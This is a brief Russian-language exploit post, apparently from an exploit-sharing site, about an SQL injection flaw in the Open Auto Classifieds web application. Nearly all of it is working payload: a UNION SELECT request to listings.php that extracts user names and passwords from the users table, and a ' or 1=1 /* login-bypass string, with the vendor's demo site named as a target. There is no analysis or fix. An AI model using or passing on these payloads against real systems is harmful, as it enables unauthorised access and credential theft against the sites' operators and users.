Программа: Open Auto Classifieds

Уязвимость позволяет удаленному злоумышленнику выполнить произвольные SQL запросы в базе данных приложения.

Эксплоит:

http://127.0.0.1/listings.php?id=-1+union+select+1,2,3,concat(user,0x3a,pass) ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25+from+users

http://openautoclassifieds.com/login.php << from demo site 🙂

in Username field just type ‘ or 1=1 /*



Оставить мнение